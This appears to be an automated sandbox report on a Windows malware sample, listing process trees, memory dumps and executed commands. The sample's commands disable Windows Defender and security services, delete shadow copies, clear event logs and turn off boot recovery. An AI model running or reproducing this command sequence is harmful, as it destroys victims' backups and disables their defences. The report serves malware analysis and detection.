PID 1308 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\net.exe
PID 1628 wrote to memory of 1688 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1628 wrote to memory of 1688 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1628 wrote to memory of 1688 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1308 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\net.exe
PID 1768 wrote to memory of 396 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1768 wrote to memory of 396 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1768 wrote to memory of 396 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1308 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\net.exe
PID 1108 wrote to memory of 1100 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1108 wrote to memory of 1100 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1108 wrote to memory of 1100 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1308 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\net.exe
PID 1056 wrote to memory of 1808 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1056 wrote to memory of 1808 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1056 wrote to memory of 1808 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1308 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\net.exe
PID 1360 wrote to memory of 1368 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1360 wrote to memory of 1368 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1360 wrote to memory of 1368 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1308 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\net.exe
PID 1308 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\net.exe
PID 1196 wrote to memory of 1332 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1196 wrote to memory of 1332 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1196 wrote to memory of 1332 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1308 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\sc.exe
PID 1308 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe C:\Windows\system32\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe

"C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

N/A

Files

memory/588-54-0x0000000000000000-mapping.dmp

memory/544-55-0x0000000000000000-mapping.dmp

memory/1116-56-0x0000000000000000-mapping.dmp

memory/1072-57-0x0000000000000000-mapping.dmp

memory/1628-58-0x0000000000000000-mapping.dmp

memory/1688-59-0x0000000000000000-mapping.dmp

memory/1768-60-0x0000000000000000-mapping.dmp

memory/396-61-0x0000000000000000-mapping.dmp

memory/1108-62-0x0000000000000000-mapping.dmp

memory/1100-63-0x0000000000000000-mapping.dmp

memory/1056-64-0x0000000000000000-mapping.dmp

memory/1808-65-0x0000000000000000-mapping.dmp

memory/1360-66-0x0000000000000000-mapping.dmp

memory/1368-67-0x0000000000000000-mapping.dmp

memory/1196-68-0x0000000000000000-mapping.dmp

memory/1332-69-0x0000000000000000-mapping.dmp

memory/1204-70-0x0000000000000000-mapping.dmp

memory/1476-71-0x0000000000000000-mapping.dmp

memory/2032-72-0x0000000000000000-mapping.dmp

memory/556-73-0x0000000000000000-mapping.dmp

memory/1836-74-0x0000000000000000-mapping.dmp

memory/680-75-0x0000000000000000-mapping.dmp

memory/912-76-0x0000000000000000-mapping.dmp

memory/1748-77-0x0000000000000000-mapping.dmp

memory/1596-78-0x0000000000000000-mapping.dmp

memory/1272-79-0x0000000000000000-mapping.dmp

memory/768-80-0x0000000000000000-mapping.dmp

memory/1072-81-0x0000000000000000-mapping.dmp

memory/1344-82-0x0000000000000000-mapping.dmp

memory/1484-83-0x0000000000000000-mapping.dmp

memory/1084-84-0x0000000000000000-mapping.dmp

memory/1088-85-0x0000000000000000-mapping.dmp

memory/1832-86-0x0000000000000000-mapping.dmp

memory/1368-87-0x0000000000000000-mapping.dmp

memory/1604-88-0x0000000000000000-mapping.dmp

memory/1212-89-0x0000000000000000-mapping.dmp

memory/1776-90-0x0000000000000000-mapping.dmp

memory/832-91-0x0000000000000000-mapping.dmp

memory/1216-92-0x0000000000000000-mapping.dmp

memory/1700-93-0x0000000000000000-mapping.dmp

memory/1740-94-0x0000000000000000-mapping.dmp

memory/1764-95-0x0000000000000000-mapping.dmp

memory/544-96-0x0000000000000000-mapping.dmp

memory/1676-97-0x0000000000000000-mapping.dmp

memory/436-98-0x0000000000000000-mapping.dmp

memory/1080-99-0x0000000000000000-mapping.dmp

memory/1304-100-0x0000000000000000-mapping.dmp

memory/1548-101-0x0000000000000000-mapping.dmp

memory/880-102-0x0000000000000000-mapping.dmp

memory/292-103-0x0000000000000000-mapping.dmp

memory/928-104-0x0000000000000000-mapping.dmp

memory/1908-105-0x0000000000000000-mapping.dmp

memory/1552-106-0x0000000000000000-mapping.dmp

memory/1496-107-0x0000000000000000-mapping.dmp

memory/1468-108-0x0000000000000000-mapping.dmp

memory/1100-109-0x0000000000000000-mapping.dmp

memory/1236-110-0x0000000000000000-mapping.dmp

memory/1028-111-0x0000000000000000-mapping.dmp

memory/1952-112-0x0000000000000000-mapping.dmp

memory/1952-113-0x000007FEFC511000-0x000007FEFC513000-memory.dmp

memory/860-114-0x0000000000000000-mapping.dmp

memory/1104-116-0x0000000000000000-mapping.dmp

memory/1712-118-0x0000000000000000-mapping.dmp

memory/1888-119-0x0000000000000000-mapping.dmp

memory/1924-120-0x0000000000000000-mapping.dmp

memory/852-122-0x000007FEF38E0000-0x000007FEF443D000-memory.dmp

memory/852-123-0x00000000022A0000-0x00000000022A2000-memory.dmp

memory/852-124-0x00000000022A2000-0x00000000022A4000-memory.dmp

memory/852-125-0x00000000022A4000-0x00000000022A7000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 167090a23e64847bcc9891c90b399071
SHA1 8bf9030451446825ac778dd9f0d42e564a5166ba
SHA256 2f6c04e155715a2efb59427bc2a4941c622fa9d51446b925a59a34cf323bbf48
SHA512 529f1926c5741c272cafb437c7903e24f36fdbb0cc8ae2a0d8bdb93cd3a8be4386559f73ba2d09c18b36f3bd9e29081d782179427b7ea3cd090a6a28404c188a

memory/852-128-0x00000000022AB000-0x00000000022CA000-memory.dmp

memory/2112-129-0x000007FEF2F40000-0x000007FEF3A9D000-memory.dmp

memory/2112-131-0x0000000002452000-0x0000000002454000-memory.dmp

memory/2112-130-0x0000000002450000-0x0000000002452000-memory.dmp

memory/2112-133-0x000000000245B000-0x000000000247A000-memory.dmp

memory/2112-132-0x0000000002454000-0x0000000002457000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-12 16:49

Reported

2022-01-12 16:49

Platform

win10-en-20211208

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A